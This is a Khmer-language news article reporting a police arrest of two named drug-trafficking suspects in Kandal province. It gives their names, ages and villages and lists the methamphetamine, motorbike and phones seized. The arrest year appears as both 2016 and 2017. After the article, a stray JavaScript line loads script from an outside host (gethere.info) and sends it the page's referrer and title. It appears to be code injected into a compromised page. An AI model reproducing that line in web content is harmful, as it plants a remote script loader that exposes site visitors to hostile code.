Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

ជនសង្ស័យ២នាក់ជាប់ពាក់ព័ន្ធនិងករណីជួញដូរគ្រឿងញៀន ត្រូវសមត្ថកិច្ចស្រុកស្អាងឃាត់ខ្លួន

ខេត្តកណ្តាល៖ កម្លាំងសមត្ថកិច្ចស្រុកស្អាងធ្វើការឃាត់ខ្លួនជនសង្ស័យ២នាក់ ករណីជួញដូរដោយខុសច្បាប់នូវសារធាតុញៀន (ម៉ាទឹកកក )។ការឃាត់ខ្លួននេះធ្វើឡើងនៅថ្ងៃទី ២៥ ខែមករា ឆ្នាំ២០១៦ វេលាម៉ោង២២និង៤៥នាទី ស្ថិត នៅចំណុចលើផ្លូវលេខ២១Bស្ថិតក្នុងភូមិ ព្រែកថី ឃុំរកាខ្ពស់ ស្រុកស្អាង ខេត្តកណ្ដាល។

ជនសង្ស័យ
១-ឈ្មោះ យូ ផាន់នាង ភេទប្រុស អាយុ១៨ឆ្នាំ មានទីលំនៅៗភូមិព្រែកតាពៅ សង្កាត់ដើមមៀន ក្រុងតាខ្មៅ ខេត្តកណ្តាល មុខរបរ
មិនពិតប្រាកដ ។
២-ឈ្មោះ លី សាឡៃ ភេទប្រុស អាយុ ៣៤ឆ្នាំ មានទីលំនៅៗភូមិ ព្រែកឡុង ឃុំរកាខ្ពស់ ស្រុកស្អាង ខេត្ត កណ្ដាល មុខរបរ មិនពិតប្រាកដ។
វត្ថុតាងចាប់យក៖
១-ម្ស៉ៅក្រាមពណ៌សថ្លាសង្ស័យថាជាសារធាតុញៀនប្រភេទម៉ាទឹកកកចំនួន ០១កញ្ចប់ធំ។
២ -ម៉ូតូចំនួន០១គ្រឿងម៉ាក សង់កូរ៉េ ពណ័ក្រហម ពាក់ស្លាកលេខ កំពង់ចាម។ ១B៧៣០៥។
៣-ទូរសព្ទ័ដៃចំនួន០២គ្រឿងម៉ាកណូគា(អិនចុចពិល)។
លោកវរះសេនីយ៍ឯក សេង សុជាតិបានប្រាប់ថា នៅថ្ងៃទី ២៥ខែមករា ឆ្នាំ២០១៧ វេលាម៉ោង ២២និង៤៥នាទីកម្លាំង អន្តរាគមន៍ស្រុក សហការជាមួយ កម្លាំងប៉ុស្តិ៍នគរបាលរដ្ឋបាលរកាខ្ពស់ បានដើរល្បាតតាមភូមិសាស្រ្ត ក៏បានប្រទះឃើញជនសង្ស័យកំពុងជិះម៉ូតូចំនួន ០១គ្រឿង នៅចំនុចលើផ្លូវលេខ២១Bស្ថិតក្នុងភូមិព្រែកថី ឃុំរកាខ្ពស់ ស្រុកស្អាង ខេត្ត កណ្ដាល ពេលនោះកម្លាំងសមត្ថកិច្ចនគរបាលក៌បានធ្វើការត្រួតពិនិត្យ បានរកឃើញគ្រឿងញៀនចំនួន ០១កញ្ចប់ធំនៅឈ្មោះ យូ ផាន់នាង រួចធ្វើការឃាត់ខ្លួនជនសង្ស័យរួមទាំងវត្ថុតាង បញ្ជូនមកប៉ុស្តិ៍នគរបាលរដ្ឋបាលរកាខ្ពស់ ដើម្បីសាកសួរ ។
នៅចំពោះមុខសមត្ថកិច្ច ឈ្មោះ យូ ផាន់នៀង បានសារភាពថា ខ្លួនបានទទួលលុយពីឈ្មោះ លី សាឡៃ ភេទប្រុសអាយុ ៣៤ឆ្នាំ នៅភូមិព្រែកឡុង ឃុំរកាខ្ពស់ ចំនួន១០ម៉ឺនរៀល ដើម្បីយកទៅទិញគ្រឿងញៀនពីឈ្មោះ ហុង ភេទប្រុស អាយុ២៨ឆ្នាំ នៅ សង្កាត់ ចាក់អង្រែក្រោម ក្នុងមួយ០១កញ្ចប់ តម្លៃ១០ម៉ឺនរៀល ។
លុះដល់វេលាម៉ោង២៣និង០០នាទី ថ្ងៃខែឆ្នាំដដែល សមត្តកិច្ចនរគបាលយើងបន្តរទៅ ធ្វើការឃាត់ខ្លួនឈ្មោះ លី សាឡៃ នៅចំនុច លើផ្លូវលេខ២១B ភូមិព្រែកថី ឃុំរកាខ្ពស់ នៅចំពោះមុខសមត្តកិច្ចស្រុកស្អាង ឈ្មោះ លី សាឡៃ បានសារភាពថាខ្លួនពិតជាបានអោយ លុយចំនួន១០ម៉ឺនរៀលទៅឈ្មោះ យូ ផាន់នាង ដើម្បីទៅទិញគ្រឿងញៀនប្រភេទម៉ាទឹកកកពិតប្រាកដមែន ដើម្បីយកទៅចែកចាយបន្តរ
បន្ទាប់មកបានបញ្ជូនជនសង្ស័យរួមនិងវត្ថុតាង មកកាន់អធិការដ្ឋាននគរបាលស្រុកស្អាង ដើម្បីបន្តប្រមូលផ្តុំសំណុំរឿងតាមនីតិវិធី ។

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More